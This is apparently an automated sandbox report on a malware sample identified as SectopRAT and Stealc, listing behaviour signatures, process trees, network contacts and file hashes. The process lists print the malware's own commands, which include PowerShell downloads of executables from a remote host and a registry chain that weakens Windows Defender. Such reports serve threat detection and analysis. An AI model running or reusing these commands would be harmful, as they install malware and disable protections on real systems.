Analysis Overview
SHA256
1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784
Threat Level: Known bad
The file file was found to be: Known bad.
Malicious Activity Summary
SectopRAT
SectopRAT payload
Stealc
Downloads MZ/PE file
Blocklisted process makes network request
Loads dropped DLL
Executes dropped EXE
Suspicious use of SetThreadContext
Program crash
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-26 09:05
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win7-20240221-en
Max time kernel
145s
Max time network
144s
Command Line
Signatures
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stealc
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1092 set thread context of 1784 | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1784 set thread context of 2688 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = (hex certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = (hex certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = (hex certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = (hex certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = (hex certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nso313F.tmp\load.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/th.php?c=1000','stat')"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
C:\Users\Admin\AppData\Local\Temp\i1.exe
i1.exe /SUB=28381000 /str=one
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
C:\Users\Admin\AppData\Local\Temp\u1d8.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1d8.0.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=456','i3.exe')"
C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe
"C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | dsepc5ud74wta.cloudfront.net | udp |
| NL | 108.156.61.188:443 | dsepc5ud74wta.cloudfront.net | tcp |
| NL | 108.156.61.188:443 | dsepc5ud74wta.cloudfront.net | tcp |
| NL | 108.156.61.188:443 | dsepc5ud74wta.cloudfront.net | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| NL | 108.156.61.188:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 240216234727901.mjj.xne26.cfd | udp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| BG | 94.156.35.76:80 | 240216234727901.mjj.xne26.cfd | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | note.padd.cn.com | udp |
| DE | 185.172.128.76:80 | 185.172.128.76 | tcp |
| RO | 176.97.76.106:80 | note.padd.cn.com | tcp |
| US | 8.8.8.8:53 | dsepc5ud74wta.cloudfront.net | udp |
| NL | 108.156.61.188:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | c.574859385.xyz | udp |
| GB | 37.221.125.202:443 | c.574859385.xyz | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| RU | 91.215.85.66:15647 | | tcp |
Files
\Users\Admin\AppData\Local\Temp\nso313F.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar350E.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6daecd9d718481846b9807ccf0f68fd5 |
| SHA1 | a81d27070405c4685459a8df30da56e472241868 |
| SHA256 | 52d7e15396072b912cb7a3a0fc3c651abbe84824af98cc47406fb10e18c4bd6c |
| SHA512 | 2e9471fef8d84d4159c3f01a8954f8326fa9b00dec1285b05ff7cfc99a7d53229e593f289a4037bf36629518d64f25b9365439c7db10854b798322728a46cdb4 |
C:\Users\Admin\AppData\Local\Temp\nso313F.tmp\load.bat
| MD5 | c03b3682569c40524152ba0ea7bc25ff |
| SHA1 | 670c137c03ade8b573e4084c12dcb1d00e377c20 |
| SHA256 | 70e43edb60c75270e41a167cfc5e6c1b60a0d022b57812560006626c3904353f |
| SHA512 | 9b0f33cf044beb3a9f558e8a09f99b263c2b617169fa036876043b5e85a92eb5f0a2ed31accad878486dfdaa144f8b780ea14378ac2e0d3b273cf6100515019a |
memory/1176-151-0x0000000073C30000-0x00000000741DB000-memory.dmp
memory/1176-152-0x0000000073C30000-0x00000000741DB000-memory.dmp
memory/1176-153-0x0000000002700000-0x0000000002740000-memory.dmp
memory/1176-154-0x0000000002700000-0x0000000002740000-memory.dmp
memory/1176-155-0x0000000073C30000-0x00000000741DB000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | aac375504b8ede54056163c34be8e372 |
| SHA1 | 4886a04d3ebe79f064527868eb581a55562e6dbc |
| SHA256 | e64206a35779430993059d57dde75c368a6387ca3a5fab69e171c93d51f8fd7b |
| SHA512 | ea5bd0fe621b5db034ddb079974e9685cc434ba11f7751ec8dc9469cbdab68f723fd8271deed5a3293753bb8d640181da521721e382f246d303b305371d7a3a7 |
memory/2640-161-0x0000000073680000-0x0000000073C2B000-memory.dmp
memory/2640-162-0x0000000002920000-0x0000000002960000-memory.dmp
memory/2640-163-0x0000000073680000-0x0000000073C2B000-memory.dmp
memory/2640-165-0x0000000073680000-0x0000000073C2B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\i1.exe
| MD5 | ae73eb4cbe39e4a9e28a367331329a12 |
| SHA1 | fa827d6b4f9c94dd137fc24b201259a4c8293913 |
| SHA256 | 5f302f2c568cfc3bef4f7690b84d15dd58caace21a60f76d807e909ff8f81e5e |
| SHA512 | b8b28158002cdd797cfe9050d93ba7d3122ac9a6e308d60c13027546bcfde0fa17df38e980016c6bb91fec62b2b6a9acfc55b58a5983e2beab248aac469a9500 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1772-170-0x0000000004190000-0x0000000004290000-memory.dmp
memory/1772-173-0x0000000000230000-0x000000000029D000-memory.dmp
memory/2684-178-0x0000000002A30000-0x0000000002A70000-memory.dmp
memory/2684-179-0x0000000073C30000-0x00000000741DB000-memory.dmp
memory/2684-180-0x0000000002A30000-0x0000000002A70000-memory.dmp
memory/2684-181-0x0000000073C30000-0x00000000741DB000-memory.dmp
memory/1048-192-0x00000000005A0000-0x00000000005A1000-memory.dmp
\Users\Admin\AppData\Local\Temp\u1d8.0.exe
| MD5 | 80e0fece33768e20034d106db0d36341 |
| SHA1 | ba12ccea1e640cdb5fedb0e9ac03aad09bdc9510 |
| SHA256 | 8a6721d38d828ce4dbbef786174faf854f366b0bf6f07189033aafa53459a14e |
| SHA512 | 1292b73f6e0673a118ad726ab14dbcbbbe9d1245cac978e5752838b51cccabd4a286397faf7de27b98cd9ab88ea04fb46aa02ec3287d641b3056593f69606e7f |
memory/1020-213-0x00000000041B0000-0x00000000042B0000-memory.dmp
memory/1020-214-0x0000000000220000-0x0000000000247000-memory.dmp
memory/1020-215-0x0000000000400000-0x000000000403C000-memory.dmp
memory/1720-224-0x0000000073680000-0x0000000073C2B000-memory.dmp
memory/1720-225-0x0000000002D40000-0x0000000002D80000-memory.dmp
memory/1720-226-0x0000000073680000-0x0000000073C2B000-memory.dmp
memory/1720-227-0x0000000002D40000-0x0000000002D80000-memory.dmp
memory/1772-228-0x0000000000400000-0x000000000405F000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9fa096e2c49bfa986058dfafa13f0423 |
| SHA1 | 25ffac8bd91cc88a42a2a502d75a0ccc94713c7c |
| SHA256 | 5d22ce5d0cd8d64687dbffea2aca9732d67ccbbf0cc28a1220657c530112d516 |
| SHA512 | 3a4421bedbe6fcaf8a3b58b50dfb65c3578f691e3357173c87cb1430fe2b98d693d8aefb128b7586d97c97e40bc53a751acfb9b394870f12d11f07bc3fbf4b78 |
memory/1772-249-0x0000000004190000-0x0000000004290000-memory.dmp
memory/1048-251-0x00000000005A0000-0x00000000005A1000-memory.dmp
memory/1720-252-0x0000000073680000-0x0000000073C2B000-memory.dmp
memory/1720-260-0x0000000002D40000-0x0000000002D80000-memory.dmp
memory/1720-291-0x0000000073680000-0x0000000073C2B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\U1D81~1.ZIP
| MD5 | 78d3ca6355c93c72b494bb6a498bf639 |
| SHA1 | 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e |
| SHA256 | a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001 |
| SHA512 | 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea |
C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe
| MD5 | 9fb4770ced09aae3b437c1c6eb6d7334 |
| SHA1 | fe54b31b0db8665aa5b22bed147e8295afc88a03 |
| SHA256 | a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3 |
| SHA512 | 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256 |
\Users\Admin\AppData\Local\Temp\u1d8.2\relay.dll
| MD5 | 10d51becd0bbce0fab147ff9658c565e |
| SHA1 | 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a |
| SHA256 | 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed |
| SHA512 | 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29 |
C:\Users\Admin\AppData\Local\Temp\u1d8.2\whale.dbf
| MD5 | a723bf46048e0bfb15b8d77d7a648c3e |
| SHA1 | 8952d3c34e9341e4425571e10f22b782695bb915 |
| SHA256 | b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422 |
| SHA512 | ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273 |
C:\Users\Admin\AppData\Local\Temp\u1d8.2\bunch.dat
| MD5 | 1e8237d3028ab52821d69099e0954f97 |
| SHA1 | 30a6ae353adda0c471c6ed5b7a2458b07185abf2 |
| SHA256 | 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742 |
| SHA512 | a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3 |
memory/1092-406-0x0000000074880000-0x00000000749F4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u1d8.2\UIxMarketPlugin.dll
| MD5 | d1ba9412e78bfc98074c5d724a1a87d6 |
| SHA1 | 0572f98d78fb0b366b5a086c2a74cc68b771d368 |
| SHA256 | cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15 |
| SHA512 | 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f |
memory/1092-413-0x0000000074880000-0x00000000749F4000-memory.dmp
memory/1092-407-0x0000000077BF0000-0x0000000077D99000-memory.dmp
memory/1772-414-0x0000000000400000-0x000000000405F000-memory.dmp
memory/1092-415-0x0000000074880000-0x00000000749F4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\49550791
| MD5 | 2fc1b4daec04683ce75e345d537cc55e |
| SHA1 | 7740019d5b50513522325a45ec52e06fcdd4f7bd |
| SHA256 | 9cfa8b7cef08a36acd7191cd650db0f423970fb16d4f5b78b720a7d8775688a1 |
| SHA512 | 65b02de96402455e19f7f6ba28851b2f0ab89c00c1cde76b9f5c4027e45a886c366da40e2fb735b0125edcccc1812ce37477b095b45b57b7648345254f4c4b44 |
memory/1784-418-0x0000000074880000-0x00000000749F4000-memory.dmp
memory/1784-419-0x0000000077BF0000-0x0000000077D99000-memory.dmp
memory/1784-467-0x0000000074880000-0x00000000749F4000-memory.dmp
memory/1784-468-0x0000000074880000-0x00000000749F4000-memory.dmp
memory/1784-472-0x0000000074880000-0x00000000749F4000-memory.dmp
memory/2688-473-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2688-470-0x0000000073170000-0x00000000741D2000-memory.dmp
memory/2688-474-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2688-476-0x0000000072A80000-0x000000007316E000-memory.dmp
memory/2688-475-0x0000000000400000-0x00000000004C6000-memory.dmp
memory/2688-477-0x0000000004ED0000-0x0000000004F10000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win10v2004-20240226-en
Max time kernel
17s
Max time network
88s
Command Line
Signatures
Stealc
Downloads MZ/PE file
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\u3sw.0.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\i1.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3620 wrote to memory of 3336 | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3620 wrote to memory of 3336 | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3620 wrote to memory of 3336 | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3336 wrote to memory of 2636 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3336 wrote to memory of 2636 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3336 wrote to memory of 2636 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsl222A.tmp\load.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/th.php?c=1000','stat')"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
C:\Users\Admin\AppData\Local\Temp\i1.exe
i1.exe /SUB=28381000 /str=one
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
C:\Users\Admin\AppData\Local\Temp\u3sw.0.exe
"C:\Users\Admin\AppData\Local\Temp\u3sw.0.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4224 -ip 4224
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 1028
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=456','i3.exe')"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3928 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Local\Temp\u3sw.2\run.exe
"C:\Users\Admin\AppData\Local\Temp\u3sw.2\run.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\u3sw.3.exe
"C:\Users\Admin\AppData\Local\Temp\u3sw.3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4928 -ip 4928
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1120
C:\Users\Admin\AppData\Local\Temp\i3.exe
i3.exe
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
C:\Users\Admin\AppData\Local\Temp\7zS350B.tmp\Install.exe
.\Install.exe /EdidWTW "385128" /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dsepc5ud74wta.cloudfront.net | udp |
| NL | 108.156.61.113:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 113.61.156.108.in-addr.arpa | udp |
